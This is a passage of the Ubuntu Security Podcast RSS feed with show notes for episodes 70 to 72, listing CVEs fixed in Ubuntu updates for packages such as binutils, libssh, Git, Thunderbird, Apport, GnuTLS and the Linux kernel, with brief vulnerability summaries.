<li><a href="https://ubuntu.com/security/CVE-2019-11764">CVE-2019-11764</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11763">CVE-2019-11763</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11762">CVE-2019-11762</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11761">CVE-2019-11761</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11760">CVE-2019-11760</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11759">CVE-2019-11759</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11758">CVE-2019-11758</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11757">CVE-2019-11757</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Updated to latest upstream version 68.7.0</li>
</ul>
<h3 id="usn-4336-1-gnu-binutils-vulnerabilities-04-46">[<a href="https://usn.ubuntu.com/4336-1/">USN-4336-1</a>] GNU binutils vulnerabilities [04:46]</h3>
<ul>
<li>44 CVEs addressed in Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9077">CVE-2019-9077</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9075">CVE-2019-9075</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9074">CVE-2019-9074</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9073">CVE-2019-9073</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9071">CVE-2019-9071</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9070">CVE-2019-9070</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17451">CVE-2019-17451</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-17450">CVE-2019-17450</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14444">CVE-2019-14444</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14250">CVE-2019-14250</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-12972">CVE-2019-12972</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-9138">CVE-2018-9138</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-8945">CVE-2018-8945</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20671">CVE-2018-20671</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20651">CVE-2018-20651</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20623">CVE-2018-20623</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-20002">CVE-2018-20002</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19932">CVE-2018-19932</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-19931">CVE-2018-19931</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18701">CVE-2018-18701</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18700">CVE-2018-18700</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18607">CVE-2018-18607</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18606">CVE-2018-18606</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18605">CVE-2018-18605</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18484">CVE-2018-18484</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18483">CVE-2018-18483</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18309">CVE-2018-18309</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-17985">CVE-2018-17985</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-17794">CVE-2018-17794</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-17360">CVE-2018-17360</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-17359">CVE-2018-17359</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-17358">CVE-2018-17358</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13033">CVE-2018-13033</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12934">CVE-2018-12934</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12700">CVE-2018-12700</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12699">CVE-2018-12699</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12698">CVE-2018-12698</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12697">CVE-2018-12697</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12641">CVE-2018-12641</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10535">CVE-2018-10535</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10534">CVE-2018-10534</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10373">CVE-2018-10373</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10372">CVE-2018-10372</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1000876">CVE-2018-1000876</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Huge update covering many issues - thanks Marc Deslauriers - mostly in
low severity issues like memory leaks in functions / utilities which are
used only once or which are assumed to process trusted input.</li>
<li>Often requested by customers who run vuln scanners - finds many open
issues but doesn&rsquo;t consider low severity - only 3 out of 44 had medium
severity</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="joe-mcmanus-talks-ros-and-ros2-with-sid-faber-from-the-ubuntu-security-team-06-26">Joe McManus talks ROS &amp; ROS2 with Sid Faber from the Ubuntu Security Team [06:26]</h3>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E072.mp3" length="20060487" type="audio/mpeg" /><itunes:duration>20:53</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 71
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-71/</link>
          <pubDate>Thu, 16 Apr 2020 12:57:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>288617260ae91cbf53afa10554396a1111971666f1ee68ec94a5ac16e3b7c294c82facbbfef6e94ec83423aa57bb5593dd84883068fc9094f80395cb14ec4766</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 71</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week Joe discusses Ubuntu's involvement in ZDI's Pwn2Own with special
  guests Steve Beattie and Marc Deslauriers from the Ubuntu Security team,
  plus we do the usual roundup of fixed vulnerabilities including libssh,
  Thunderbird,...
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week Joe discusses Ubuntu's involvement in ZDI's Pwn2Own with special
  guests Steve Beattie and Marc Deslauriers from the Ubuntu Security team,
  plus we do the usual roundup of fixed vulnerabilities including libssh,
  Thunderbird, Git and a kernel Livepatch.
  </itunes:summary>
        <description>  This week Joe discusses Ubuntu's involvement in ZDI's Pwn2Own with special
  guests Steve Beattie and Marc Deslauriers from the Ubuntu Security team,
  plus we do the usual roundup of fixed vulnerabilities including libssh,
  Thunderbird, Git and a kernel Livepatch.
  </description>
        <googleplay:description>  This week Joe discusses Ubuntu's involvement in ZDI's Pwn2Own with special
  guests Steve Beattie and Marc Deslauriers from the Ubuntu Security team,
  plus we do the usual roundup of fixed vulnerabilities including libssh,
  Thunderbird, Git and a kernel Livepatch.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week Joe discusses Ubuntu&rsquo;s involvement in ZDI&rsquo;s Pwn2Own with special
guests Steve Beattie and Marc Deslauriers from the Ubuntu Security team,
plus we do the usual roundup of fixed vulnerabilities including libssh,
Thunderbird, Git and a kernel Livepatch.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>38 unique CVEs addressed</p>
<h3 id="usn-4325-1-linux-kernel-vulnerabilities-00-59">[<a href="https://usn.ubuntu.com/4325-1/">USN-4325-1</a>] Linux kernel vulnerabilities [00:59]</h3>
<ul>
<li>2 CVEs addressed in Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8428">CVE-2020-8428</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19046">CVE-2019-19046</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.0 (bionic clouds / oem - oracle, gke, gcp, azure, etc)</li>
<li>VFS UAF and IPMI memory leak - <a href="https://ubuntusecuritypodcast.org/episode-70/">Episode 70</a></li>
</ul>
<h3 id="usn-4326-1-libiberty-vulnerabilities-01-46">[<a href="https://usn.ubuntu.com/4326-1/">USN-4326-1</a>] libiberty vulnerabilities [01:46]</h3>
<ul>
<li>14 CVEs addressed in Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-9071">CVE-2019-9071</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-9070">CVE-2019-9070</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-14250">CVE-2019-14250</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-9138">CVE-2018-9138</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18701">CVE-2018-18701</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18700">CVE-2018-18700</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18484">CVE-2018-18484</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-18483">CVE-2018-18483</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-17985">CVE-2018-17985</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-17794">CVE-2018-17794</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12934">CVE-2018-12934</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12698">CVE-2018-12698</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12697">CVE-2018-12697</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12641">CVE-2018-12641</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>libib - collection of subroutines used by other libraries / applications
<ul>
<li>primarily binutils for parsing binary formats (ELF executables etc)</li>
</ul>
</li>
<li>Mostly low priority issues (DoS via memory leak / NULL ptr dereference in
say objdump etc)</li>
<li>1 medium - integer overflow -&gt; heap buffer overflow in parsing a crafted
ELF file</li>
</ul>
<h3 id="usn-4327-1-libssh-vulnerability-02-57">[<a href="https://usn.ubuntu.com/4327-1/">USN-4327-1</a>] libssh vulnerability [02:57]</h3>
<ul>
<li>1 CVEs addressed in Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-1730">CVE-2020-1730</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Malicious client / server could crash other end when using AES-CTR
ciphers - error in memory handling on cleanup of cipher context when
closing the connection -&gt; DoS</li>
</ul>
<h3 id="lsn-0065-1-linux-kernel-vulnerability-03-41">[<a href="https://lists.ubuntu.com/archives/ubuntu-security-announce/2020-April/005391.html">LSN-0065-1</a>] Linux kernel vulnerability [03:41]</h3>
<ul>
<li>3 CVEs addressed in Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8428">CVE-2020-8428</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-3016">CVE-2019-3016</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2013-1798">CVE-2013-1798</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Livepatch for VFS UAF, fix a possible SpectreV1/L1TF gadget introduced
back in 2013 for a KVM IOAPIC issue, KVM TLB flush (<a href="https://ubuntusecuritypodcast.org/episode-67/">Episode 67</a>)</li>
</ul>
<h3 id="usn-4328-1-thunderbird-vulnerabilities-04-31">[<a href="https://usn.ubuntu.com/4328-1/">USN-4328-1</a>] Thunderbird vulnerabilities [04:31]</h3>
<ul>
<li>18 CVEs addressed in Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-6811">CVE-2020-6811</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6825">CVE-2020-6825</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6821">CVE-2020-6821</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6820">CVE-2020-6820</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6819">CVE-2020-6819</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6814">CVE-2020-6814</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6812">CVE-2020-6812</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6807">CVE-2020-6807</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6806">CVE-2020-6806</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6805">CVE-2020-6805</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6800">CVE-2020-6800</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6798">CVE-2020-6798</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-20503">CVE-2019-20503</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6794">CVE-2020-6794</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6822">CVE-2020-6822</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6795">CVE-2020-6795</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6793">CVE-2020-6793</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6792">CVE-2020-6792</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>68.7.0</li>
<li>Includes various fixes for issues previously covered in Firefox updates</li>
</ul>
<h3 id="usn-4329-1-git-vulnerability-05-11">[<a href="https://usn.ubuntu.com/4329-1/">USN-4329-1</a>] Git vulnerability [05:11]</h3>
<ul>
<li>1 CVEs addressed in Xenial, Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-5260">CVE-2020-5260</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Would not properly handle URLs that include newlines - and would possibly
send credentials to the wrong host as a result - fixed by forbidding a
newline in any part of credential handling</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="joe-discusses-ubuntu-s-participation-in-zdi-s-pwn2own-with-steve-beattie-and-marc-deslauriers-06-25">Joe discusses Ubuntu&rsquo;s participation in ZDI&rsquo;s Pwn2Own with Steve Beattie and Marc Deslauriers [06:25]</h3>
<ul>
<li><a href="https://www.thezdi.com/blog/2020/3/19/pwn2own-2020-day-one-results">https://www.thezdi.com/blog/2020/3/19/pwn2own-2020-day-one-results</a></li>
<li><a href="https://www.zdnet.com/article/windows-ubuntu-macos-virtualbox-fall-at-pwn2own-hacking-contest/">https://www.zdnet.com/article/windows-ubuntu-macos-virtualbox-fall-at-pwn2own-hacking-contest/</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E071.mp3" length="23359020" type="audio/mpeg" /><itunes:duration>24:19</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 70
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-70/</link>
          <pubDate>Fri, 10 Apr 2020 14:12:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>2bf9926db3b0c53514ff0d5a54efbbbef0f32c597d0d989eb0fae132d2427a4a8ee74c3faa35d4cb5d31bdb00e475d42800b711d12962686e283f97696b037eb</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 70</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we have a great interview between Joe McManus and Emilia Torino from the Ubuntu
  Security team, plus we cover security updates for Apport, Firefox, GnuTLS,
  the Linux kernel and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we have a great interview between Joe McManus and Emilia Torino from the Ubuntu
  Security team, plus we cover security updates for Apport, Firefox, GnuTLS,
  the Linux kernel and more.
  </itunes:summary>
        <description>  This week we have a great interview between Joe McManus and Emilia Torino from the Ubuntu
  Security team, plus we cover security updates for Apport, Firefox, GnuTLS,
  the Linux kernel and more.
  </description>
        <googleplay:description>  This week we have a great interview between Joe McManus and Emilia Torino from the Ubuntu
  Security team, plus we cover security updates for Apport, Firefox, GnuTLS,
  the Linux kernel and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we have a great interview between Joe McManus and Emilia Torino from the Ubuntu
Security team, plus we cover security updates for Apport, Firefox, GnuTLS,
the Linux kernel and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>18 unique CVEs addressed</p>
<h3 id="usn-4315-1-apport-vulnerabilities-00-32">[<a href="https://usn.ubuntu.com/4315-1/">USN-4315-1</a>] Apport vulnerabilities [00:32]</h3>
<ul>
<li>2 CVEs addressed in Xenial, Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8833">CVE-2020-8833</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-8831">CVE-2020-8831</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Apport creates it&rsquo;s lock file as world writable in a world-writable
location - so a local attacker could create a symlink in it&rsquo;s place to a
non-existant file in a root-owned location and Apport would end up
creating that file but with world-writable permissions - so could be used
to possibly escalate privileges say by dropping a new cron file or
similar.</li>
<li>Apport runs as root but drops privileges when creating crash reports -
and then changes permissions on crash report to be owned by the user -
again using a symlink attack it could be possible to get Apport to change
the permissions on an arbitrary file to be readable by a regular user and
hence disclose sensitive information. Is generally mitigated by
protected_symlinks setting.</li>
</ul>
<h3 id="usn-4316-1-usn-4316-2-gd-graphics-library-vulnerabilities-02-46">[<a href="https://usn.ubuntu.com/4316-1/">USN-4316-1</a>, <a href="https://usn.ubuntu.com/4316-2/">USN-4316-2</a>] GD Graphics Library vulnerabilities [02:46]</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM, Xenial, Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-11038">CVE-2019-11038</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14553">CVE-2018-14553</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Used by php for image handling</li>
<li>Use of an uninitialized variable during
image creation -&gt; info leak or possible memory corruption</li>
<li>NULL ptr deref in certain circumstances</li>
</ul>
<h3 id="usn-4317-1-firefox-vulnerabilities-03-10">[<a href="https://usn.ubuntu.com/4317-1/">USN-4317-1</a>] Firefox vulnerabilities [03:10]</h3>
<ul>
<li>2 CVEs addressed in Xenial, Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-6820">CVE-2020-6820</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6819">CVE-2020-6819</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>74.0.1 - reports of two issues being used to exploit Firefox in the
wild - <a href="https://www.mozilla.org/en-US/security/advisories/mfsa2020-11/">https://www.mozilla.org/en-US/security/advisories/mfsa2020-11/</a></li>
<li>2 use-after-free  -&gt; remote code execution</li>
</ul>
<h3 id="usn-4321-1-haproxy-vulnerability-03-56">[<a href="https://usn.ubuntu.com/4321-1/">USN-4321-1</a>] HAProxy vulnerability [03:56]</h3>
<ul>
<li>1 CVEs addressed in Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-11100">CVE-2020-11100</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Arbitrary heap memory write in HPACK decoder (HTTP/2 header
compression) -&gt; crash, DoS or possible RCE</li>
</ul>
<h3 id="usn-4322-1-gnutls-vulnerability-04-35">[<a href="https://usn.ubuntu.com/4322-1/">USN-4322-1</a>] GnuTLS vulnerability [04:35]</h3>
<ul>
<li>1 CVEs addressed in Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-11501">CVE-2020-11501</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Used all zeros instead of a random 32-byte value for key negotiation as a
DTLS client - so breaks the security guarantees of DTLS
(datagram-TLS). Introduced in a code change which changed a boolean OR to
and AND without inverting the logic (ie De Morgan)</li>
</ul>
<h3 id="usn-4323-1-firefox-vulnerabilities-05-28">[<a href="https://usn.ubuntu.com/4323-1/">USN-4323-1</a>] Firefox vulnerabilities [05:28]</h3>
<ul>
<li>6 CVEs addressed in Xenial, Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-6823">CVE-2020-6823</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6826">CVE-2020-6826</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6825">CVE-2020-6825</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6824">CVE-2020-6824</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6822">CVE-2020-6822</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-6821">CVE-2020-6821</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>75.0</li>
<li>Malicious extension could possibly steal auth codes from OAuth login
sequences</li>
<li>Memory corruption -&gt; DoS, info leak or RCE via malicious website</li>
</ul>
<h3 id="usn-4318-1-linux-kernel-vulnerabilities-06-18">[<a href="https://usn.ubuntu.com/4318-1/">USN-4318-1</a>] Linux kernel vulnerabilities [06:18]</h3>
<ul>
<li>3 CVEs addressed in Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8992">CVE-2020-8992</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-8834">CVE-2020-8834</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-8428">CVE-2020-8428</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 bionic kernel (xenial hwe)</li>
<li>3 DoS issues:
<ul>
<li>Use-after-free in VFS layer -&gt; crash / info-leak</li>
<li>PowerPC KVM guest to host state memory corruption -&gt; crash</li>
<li>Soft-lockup via malicious ext4 image due to failure to properly validate
the journal size</li>
</ul>
</li>
</ul>
<h3 id="usn-4319-1-usn-4325-1-linux-kernel-vulnerabilities-07-22">[<a href="https://usn.ubuntu.com/4319-1/">USN-4319-1</a>, <a href="https://usn.ubuntu.com/4325-1/">USN-4325-1</a>] Linux kernel vulnerabilities [07:22]</h3>
<ul>
<li>2 CVEs addressed in Bionic, Eoan
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8428">CVE-2020-8428</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-19046">CVE-2019-19046</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.3 eoan kernel (bionic hwe), 5.0 bionic clouds kernel</li>
<li>VFS UAF from above</li>
<li>Memory leak in IPMI handler -&gt; DoS via memory exhaustion</li>
</ul>
<h3 id="usn-4320-1-linux-kernel-vulnerability-08-08">[<a href="https://usn.ubuntu.com/4320-1/">USN-4320-1</a>] Linux kernel vulnerability [08:08]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM, Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8428">CVE-2020-8428</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.4 xenial kernel (trusty hwe)</li>
<li>VFS UAF</li>
</ul>
<h3 id="usn-4324-1-linux-kernel-vulnerabilities-08-33">[<a href="https://usn.ubuntu.com/4324-1/">USN-4324-1</a>] Linux kernel vulnerabilities [08:33]</h3>
<ul>
<li>2 CVEs addressed in Trusty ESM, Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8992">CVE-2020-8992</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-8428">CVE-2020-8428</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>4.15 rapsi, snapdragon, gke, aws etc - bionic, xenial hwe, trusty esm hwe</li>
<li>VFS UAF</li>
<li>Ext4 soft-lockup issue</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="joe-talks-with-ubuntu-security-team-member-emilia-torino-09-06">Joe talks with Ubuntu Security Team member Emilia Torino [09:06]</h3>
<h3 id="uncompressed-oval-data-being-discontinued-on-1st-may-24-25">Uncompressed OVAL data being discontinued on 1st May [24:25]</h3>
<ul>
<li>Will still have bzip2 compressed form just removing uncompressed since is
redundant and too large to be useful in general</li>
<li><a href="https://discourse.ubuntu.com/t/uncompressed-oval-data-going-away/14981">https://discourse.ubuntu.com/t/uncompressed-oval-data-going-away/14981</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E070.mp3" length="25363135" type="audio/mpeg" /><itunes:duration>26:25</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 69
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-69/</link>
          <pubDate>Thu, 02 Apr 2020 16:32:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>54acb3f1d99f7e138c0b47e12f3aa055d4330e7937cc9eb6e2453df849a76fed266be57f9e59c68dd957b9c370624697eb53175a7f475b952b70fed6a5c7be2f</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 69</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we cover security updates for a Linux kernel vulnerability
